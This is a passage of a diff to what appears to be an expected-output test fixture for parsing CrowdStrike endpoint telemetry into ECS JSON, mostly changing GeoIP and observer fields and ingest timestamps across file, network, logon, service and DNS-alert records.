"{\"AuthenticationId\":\"895027\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextProcessId\":\"1786917081743\",\"ContextThreadId\":\"31685015444484\",\"ContextTimeStamp\":\"1604855317.892\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"0000000000000000be341bb58bc5f1f2a24339010200510e\",\"FileObject\":\"18446636933702558240\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"1\",\"IsOnRemovableDisk\":\"0\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Size\":\"223989\",\"TargetFileName\":\"\\\\Device\\\\Mup\\\\intranet.dev\\\\int\\\\Test.pptx\",\"TokenType\":\"1\",\"aid\":\"fffffffffa474d216472f3edb73c75ed\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"OoxmlFileWritten\",\"id\":\"ffffffff-1111-11eb-9165-067ee18a7975\",\"name\":\"OoxmlFileWrittenV11\",\"timestamp\":\"1604855329571\"}", "created": "2020-11-08T17:08:49.571Z", "kind": "event", @@ -8352,18 +9438,12 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 50373, @@ -8381,12 +9461,21 @@ "direction": "unknown" }, "observer": { - "serial_number": "ffffffff1f924e228a807ea4c0f21b0b", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff1f924e228a807ea4c0f21b0b", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:09:11.158Z", "ecs": { @@ -8408,7 +9497,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151250400Z", + "ingested": "2021-12-14T14:41:26.533793517Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3765958535\",\"ConnectionDirection\":\"2\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"439029805661\",\"ContextThreadId\":\"273683743193497\",\"ContextTimeStamp\":\"1604855351.158\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"LocalPort\":\"50373\",\"Protocol\":\"6\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:0\",\"RemotePort\":\"0\",\"aid\":\"ffffffff1f924e228a807ea4c0f21b0b\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NetworkListenIP6\",\"id\":\"ffffffff-1111-11eb-85f5-02ab029194b9\",\"name\":\"NetworkListenIP6V5\",\"timestamp\":\"1604855351798\"}", "created": "2020-11-08T17:09:11.798Z", "kind": "event", @@ -8449,12 +9538,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff1f32487185fcde66a9dc0528", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0011104.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff1f32487185fcde66a9dc0528", + "type": "agent", + "version": "1007.4.0011104.1" }, "@timestamp": "2020-11-08T14:34:30.744Z", "file": { @@ -8483,7 +9581,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151256800Z", + "ingested": "2021-12-14T14:41:26.533793905Z", "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1457965279\",\"ContextProcessId\":\"321365562189152025\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604846070.744\",\"Entitlements\":\"15\",\"SHA256HashData\":\"e1bed7598ffdecf63a4d240f8309b528fc45068c6cb8137a5090f3afeb57f29d\",\"Size\":\"29646\",\"TargetFileName\":\"/System/Library/CoreServices/SecurityAgentPlugins/HomeDirMechanism.bundle/Contents/MacOS/HomeDirMechanism/..namedfork/rsrc\",\"VnodeModificationType\":\"10\",\"aid\":\"ffffffff1f32487185fcde66a9dc0528\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"AsepFileChange\",\"id\":\"ffffffff-1111-11eb-b9b4-063e98f9b19b\",\"name\":\"AsepFileChangeMacV2\",\"timestamp\":\"1604855355495\"}", "created": "2020-11-08T17:09:15.495Z", "kind": "event", @@ -8523,12 +9621,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffa5bd4efaa195a7132c576edc", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffffa5bd4efaa195a7132c576edc", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:06:31.803Z", "ecs": { @@ -8549,7 +9656,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151263100Z", + "ingested": "2021-12-14T14:41:26.533794287Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3011122681\",\"ContextProcessId\":\"2932136\",\"ContextThreadId\":\"36157339485804\",\"ContextTimeStamp\":\"1604855191.803\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"LogonTime\":\"\",\"PasswordLastSet\":\"\",\"UserLogonFlags\":\"1\",\"UserName\":\"user7\",\"UserSid\":\"S-1-5-10\",\"aid\":\"ffffffffa5bd4efaa195a7132c576edc\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserLogonFailed\",\"id\":\"ffffffff-1111-11eb-aa5a-0207e26418af\",\"name\":\"UserLogonFailedV1\",\"timestamp\":\"1604855193422\"}", "created": "2020-11-08T17:06:33.422Z", "kind": "event", @@ -8586,18 +9693,12 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 443, @@ -8606,18 +9707,12 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 49689, @@ -8636,12 +9731,21 @@ "direction": "outbound" }, "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "vendor": "crowdstrike", + "ip": "67.43.156.14", "serial_number": "ffffffff6854438eb4181691ec47e43d", - "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0011603.1", - "vendor": "crowdstrike", - "ip": "67.43.156.14" + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:05:36.669Z", "ecs": { @@ -8661,7 +9765,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151269500Z", + "ingested": "2021-12-14T14:41:26.533794738Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"1858880895\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"56042872298\",\"ContextTimeStamp\":\"1604855136.669\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"LocalPort\":\"49689\",\"Protocol\":\"6\",\"RemoteAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"RemotePort\":\"443\",\"aid\":\"ffffffff6854438eb4181691ec47e43d\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NetworkConnectIP6\",\"id\":\"ffffffff-1111-11eb-a889-061944805289\",\"name\":\"NetworkConnectIP6V5\",\"timestamp\":\"1604855199798\"}", "created": "2020-11-08T17:06:39.798Z", "kind": "event", @@ -8703,12 +9807,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffc07b49d6b7426e970523671a", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0011104.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffc07b49d6b7426e970523671a", + "type": "agent", + "version": "1007.4.0011104.1" }, "@timestamp": "2020-11-08T16:42:35.987Z", "file": { @@ -8738,7 +9851,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151276300Z", + "ingested": "2021-12-14T14:41:26.533795298Z", "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1789338890\",\"ContextProcessId\":\"321382909294815631\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604853755.987\",\"Entitlements\":\"15\",\"SHA256HashData\":\"fa07e991e0c3f3661794bba39061433265162b10cd9036751941cc45e6a4b583\",\"Size\":\"165\",\"SourceFileName\":\"/Library/Application Support/JAMF/tmp/.dat.nosync2c98.VBwjsq\",\"TargetFileName\":\"/Library/Application Support/JAMF/tmp/6B24D2B6-BC17-4470-8078-91A787A19478\",\"aid\":\"ffffffffc07b49d6b7426e970523671a\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NewExecutableRenamed\",\"id\":\"ffffffff-1111-11eb-8773-06939a2f0915\",\"name\":\"NewExecutableRenamedMacV1\",\"timestamp\":\"1604855213224\"}", "created": "2020-11-08T17:06:53.224Z", "kind": "event", @@ -8789,12 +9902,21 @@ "direction": "outbound" }, "observer": { - "serial_number": "ffffffffa60a47af4ebd2a76070f0d4f", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0011104.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffa60a47af4ebd2a76070f0d4f", + "type": "agent", + "version": "1007.4.0011104.1" }, "@timestamp": "2020-11-08T17:07:48.323Z", "ecs": { @@ -8814,7 +9936,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151282800Z", + "ingested": "2021-12-14T14:41:26.533795704Z", "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"203564169\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"321367236803434269\",\"ContextTimeStamp\":\"1604855268.323\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:0\",\"LocalPort\":\"51076\",\"Protocol\":\"6\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:0\",\"RemotePort\":\"0\",\"aid\":\"ffffffffa60a47af4ebd2a76070f0d4f\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NetworkListenIP6\",\"id\":\"ffffffff-1111-11eb-9a50-0669ff09604d\",\"name\":\"NetworkListenIP6MacV5\",\"timestamp\":\"1604855268755\"}", "created": "2020-11-08T17:07:48.755Z", "kind": "event", @@ -8838,30 +9960,33 @@ } }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "vendor": "crowdstrike", + "ip": "67.43.156.13", + "serial_number": "ffffffff6d724d38af99c628fb904626", + "type": "agent", + "version": "1007.3.0011603.1" + }, "process": { "entity_id": "1611521722601", "thread": { "id": 53405065993811 } }, + "@timestamp": "2020-11-08T17:08:00.307Z", "os": { "type": "windows" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffff6d724d38af99c628fb904626", - "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", - "vendor": "crowdstrike", - "ip": "67.43.156.13" - }, - "@timestamp": "2020-11-08T17:08:00.307Z", "ecs": { "version": "1.12.0" }, @@ -8877,7 +10002,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151289100Z", + "ingested": "2021-12-14T14:41:26.533796098Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3765958535\",\"ContextProcessId\":\"1611521722601\",\"ContextThreadId\":\"53405065993811\",\"ContextTimeStamp\":\"1604855280.307\",\"DomainName\":\"raw.githubusercontent.com\",\"DualRequest\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InterfaceIndex\":\"0\",\"RequestType\":\"1\",\"aid\":\"ffffffff6d724d38af99c628fb904626\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"SuspiciousDnsRequest\",\"id\":\"ffffffff-1111-11eb-885e-02ac336efd4b\",\"name\":\"SuspiciousDnsRequestV2\",\"timestamp\":\"1604855323217\"}", "created": "2020-11-08T17:08:43.217Z", "kind": "alert", @@ -8901,7 +10026,13 @@ "EffectiveTransmissionClass": "3", "RequestType": "1", "cid": "ffffffff30a3407dae27d0503611022d" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -8920,12 +10051,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff1990483499a736373600eef7", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "100.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff1990483499a736373600eef7", + "type": "agent", + "version": "100.3.0011603.1" }, "@timestamp": "2020-11-08T17:08:35.034Z", "file": { @@ -8943,7 +10083,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151295300Z", + "ingested": "2021-12-14T14:41:26.533796949Z", "original": "{\"ConfigBuild\":\"100.3.0011603.1\",\"ContextProcessId\":\"4492535979973\",\"ContextThreadId\":\"14023068415125\",\"ContextTimeStamp\":\"1604855315.034\",\"DiskParentDeviceInstanceId\":\"PCI\\\\VEN_8086\\u0026DEV_31E3\\u0026SUBSYS_080C1028\\u0026REV_03\\\\3\\u002611583659\\u00260\\u002690\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"VolumeDeviceCharacteristics\":\"131072\",\"VolumeDeviceObjectFlags\":\"134479872\",\"VolumeDeviceType\":\"8\",\"VolumeDriveLetter\":\"C:\",\"VolumeFileSystemDevice\":\"\\\\Ntfs\",\"VolumeFileSystemDriver\":\"\\\\FileSystem\\\\Ntfs\",\"VolumeFileSystemType\":\"2\",\"VolumeIsEncrypted\":\"0\",\"VolumeMountPoint\":\"\\\\??\\\\Volume{9b46da3f-ce44-432f-9230-c9201504bfd7}\",\"VolumeName\":\"\\\\Device\\\\HarddiskVolume4\",\"VolumeRealDeviceName\":\"\\\\Device\\\\HarddiskVolume4\",\"VolumeSectorSize\":\"512\",\"aid\":\"ffffffff1990483499a736373600eef7\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"FsVolumeMounted\",\"id\":\"ffffffff-1111-11eb-9be9-024459b713c5\",\"name\":\"FsVolumeMountedV6\",\"timestamp\":\"1604855329102\"}", "created": "2020-11-08T17:08:49.102Z", "kind": "event", @@ -9005,12 +10145,21 @@ "direction": "outbound" }, "observer": { - "serial_number": "ffffffffe5ff467b4f0c4fd41a4462bb", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0011104.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffe5ff467b4f0c4fd41a4462bb", + "type": "agent", + "version": "1007.4.0011104.1" }, "@timestamp": "2020-11-08T17:05:27.011Z", "ecs": { @@ -9032,7 +10181,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151301600Z", + "ingested": "2021-12-14T14:41:26.533797361Z", "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1789338890\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"321210562584146513\",\"ContextTimeStamp\":\"1604855127.011\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP4\":\"127.0.0.1\",\"LocalPort\":\"53\",\"Protocol\":\"6\",\"RemoteAddressIP4\":\"0.0.0.0\",\"RemotePort\":\"0\",\"aid\":\"ffffffffe5ff467b4f0c4fd41a4462bb\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NetworkListenIP4\",\"id\":\"ffffffff-1111-11eb-ae74-065212970c5d\",\"name\":\"NetworkListenIP4MacV5\",\"timestamp\":\"1604855128936\"}", "created": "2020-11-08T17:05:28.936Z", "kind": "event", @@ -9071,12 +10220,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff59514ea68b4693ddfb9b6643", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff59514ea68b4693ddfb9b6643", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:06:25.108Z", "ecs": { @@ -9097,7 +10255,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151308Z", + "ingested": "2021-12-14T14:41:26.533797753Z", "original": "{\"AuthenticationId\":\"999\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextTimeStamp\":\"1604855185.108\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\gpsvc.dll\",\"InterfaceGuid\":\"367ABB81-9844-35F1-AD32-98F038001003\",\"InterfaceVersion\":\"131072\",\"RpcClientProcessId\":\"219053851298\",\"RpcClientThreadId\":\"22047924482692\",\"RpcNestingLevel\":\"0\",\"RpcOpNum\":\"19\",\"ServiceDisplayName\":\"gpsvc\",\"TargetProcessId\":\"224116976578\",\"TargetThreadId\":\"22920092479704\",\"TokenType\":\"1\",\"UserName\":\"user7\",\"aid\":\"ffffffff59514ea68b4693ddfb9b6643\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"HostedServiceStarted\",\"id\":\"ffffffff-1111-11eb-860c-0606af112d55\",\"name\":\"HostedServiceStartedV2\",\"timestamp\":\"1604855184068\"}", "created": "2020-11-08T17:06:24.068Z", "kind": "event", @@ -9132,28 +10290,31 @@ } }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "vendor": "crowdstrike", + "ip": "67.43.156.13", + "serial_number": "ffffffff2b5a4bf5afc6682595faa016", + "type": "agent", + "version": "1007.3.0011603.1" + }, "process": { "entity_id": "661455186053", "title": "wuauserv" }, + "@timestamp": "2020-11-08T17:08:19.018Z", "os": { "type": "windows" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffff2b5a4bf5afc6682595faa016", - "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", - "vendor": "crowdstrike", - "ip": "67.43.156.13" - }, - "@timestamp": "2020-11-08T17:08:19.018Z", "ecs": { "version": "1.12.0" }, @@ -9169,7 +10330,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151314400Z", + "ingested": "2021-12-14T14:41:26.533798147Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextTimeStamp\":\"1604855299.018\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ServiceDisplayName\":\"wuauserv\",\"TargetProcessId\":\"661455186053\",\"TargetThreadId\":\"24238019995551\",\"aid\":\"ffffffff2b5a4bf5afc6682595faa016\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"HostedServiceStopped\",\"id\":\"ffffffff-1111-11eb-9b11-0602a5689467\",\"name\":\"HostedServiceStoppedV1\",\"timestamp\":\"1604855302512\"}", "created": "2020-11-08T17:08:22.512Z", "kind": "event", @@ -9190,7 +10351,13 @@ "EffectiveTransmissionClass": "3", "Entitlements": "15", "cid": "ffffffff30a3407dae27d0503611022d" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -9209,12 +10376,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff32cb4abc50bc133b31a69946", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff32cb4abc50bc133b31a69946", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:07:07.625Z", "file": { @@ -9242,7 +10418,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151320700Z", + "ingested": "2021-12-14T14:41:26.533798616Z", "original": "{\"AuthenticationId\":\"3443175\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextProcessId\":\"1091372257857\",\"ContextThreadId\":\"36855848099771\",\"ContextTimeStamp\":\"1604855227.625\",\"DiskParentDeviceInstanceId\":\"PCI\\\\VEN_1179\\u0026DEV_0113\\u0026SUBSYS_00011179\\u0026REV_01\\\\4\\u00263ad42678\\u00260\\u002600E0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"f5ce07c6af67ec4ebe0846ff200bfc2f54f7020000002100\",\"FileObject\":\"18446603341701082336\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"0\",\"IsOnRemovableDisk\":\"0\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Size\":\"288041\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\user12\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\\\TempState\\\\Downloads\\\\ex.pdf.8e41hf8.partial\",\"TokenType\":\"1\",\"aid\":\"ffffffff32cb4abc50bc133b31a69946\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"PdfFileWritten\",\"id\":\"ffffffff-1111-11eb-baea-02dccfbb7779\",\"name\":\"PdfFileWrittenV11\",\"timestamp\":\"1604855264313\"}", "created": "2020-11-08T17:07:44.313Z", "kind": "event", @@ -9305,12 +10481,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff655344736aca58d17fb570f0", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.3.0012309.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff655344736aca58d17fb570f0", + "type": "agent", + "version": "1007.3.0012309.1" }, "@timestamp": "2020-11-08T17:06:22.022Z", "ecs": { @@ -9330,7 +10515,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151327Z", + "ingested": "2021-12-14T14:41:26.533799035Z", "original": "{\"AuthenticationId\":\"3783389\",\"CommandLine\":\"\\\"C:\\\\WINDOWS\\\\system32\\\\backgroundTaskHost.exe\\\" -ServerName:App.AppXnme9zjyebb2xnyygh6q9ev6p5d234br2.mca\",\"ConfigBuild\":\"1007.3.0012309.1\",\"ConfigStateHash\":\"3998263252\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\System32\\\\backgroundTaskHost.exe\",\"ImageSubsystem\":\"2\",\"IntegrityLevel\":\"4096\",\"MD5HashData\":\"50d5fd1290d94d46acca0585311e74d5\",\"ParentAuthenticationId\":\"3783389\",\"ParentBaseFileName\":\"svchost.exe\",\"ParentProcessId\":\"2439558094566\",\"ProcessCreateFlags\":\"525332\",\"ProcessEndTime\":\"\",\"ProcessParameterFlags\":\"16385\",\"ProcessStartTime\":\"1604855181.648\",\"ProcessSxsFlags\":\"1600\",\"RawProcessId\":\"22272\",\"RpcClientProcessId\":\"2439558094566\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"b8e176fe76a1454a00c4af0f8bf8870650d9c33d3e333239a59445c5b35c9a37\",\"SessionId\":\"1\",\"SourceProcessId\":\"2439558094566\",\"SourceThreadId\":\"77538684027214\",\"Tags\":\"41, 12094627905582, 12094627906234\",\"TargetProcessId\":\"2450046082233\",\"TokenType\":\"2\",\"UserSid\":\"S-1-12-1-3697283754-1083485977-2164330645-2516515886\",\"WindowFlags\":\"128\",\"aid\":\"ffffffff655344736aca58d17fb570f0\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-8462-02ade3b2f949\",\"name\":\"ProcessRollup2V18\",\"timestamp\":\"1604855182022\"}", "created": "2020-11-08T17:06:22.022Z", "kind": "event", @@ -9374,24 +10559,27 @@ } }, { - "os": { - "type": "macos" - }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], "observer": { - "serial_number": "ffffffff1f32487185fcde66a9dc0528", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0011104.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff1f32487185fcde66a9dc0528", + "type": "agent", + "version": "1007.4.0011104.1" }, "@timestamp": "2020-11-08T17:09:15.388Z", + "os": { + "type": "macos" + }, "ecs": { "version": "1.12.0" }, @@ -9410,7 +10598,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151333400Z", + "ingested": "2021-12-14T14:41:26.533799422Z", "original": 